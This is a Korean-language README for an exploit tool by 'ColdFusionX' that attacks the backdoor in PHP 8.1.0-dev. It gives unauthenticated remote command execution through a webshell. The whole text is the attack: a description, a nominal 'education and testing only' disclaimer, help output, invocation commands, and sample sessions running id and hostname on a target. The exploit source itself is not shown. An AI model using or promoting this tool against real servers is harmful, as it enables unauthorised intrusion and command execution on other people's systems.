
PHP 8.1.0-dev WebShell 원격 코드 실행
PHP 8.1.0-dev WebShell RCE(인증되지 않은)용 익스플로잇 코드
예상 결과: PHP 8.1.0-dev 서버에 설치된 백도어를 악용하여 WebShell을 획득하고 원격으로 명령을 실행합니다.
기업 환경에서 교육 및 테스트 목적으로만 사용하세요.
이 익스플로잇은 Python 3.8.6에서 테스트되었습니다.
cfx: ~/Documents/
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL]
PHP 8.1.0-dev WebShell RCE by ColdFusionX
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)
Exploit Usage :
./exploit.py -l http://127.0.0.1
[^] WebShell=- id
OR
[^] WebShell=- whoami
이 익스플로잇은 초기 실행 시 단일 인수를 필요로 합니다:
cfx: ~/Documents/
→ ./exploit.py -l http://127.0.0.1
[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX
Target is running on PHP 8.1.0-dev
*Shoot your commands below*
[^] WebShell=- id
uid=1000(cfx) gid=1000(cfx) groups=1000(cfx)
[^] WebShell=- hostname
shockwave
[^] WebShell=- ^C
Exiting.
cfx: ~/Documents/
→ ./exploit.py -l http://127.0.0.1
[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX
Invalid URL or Target Not Vulnerable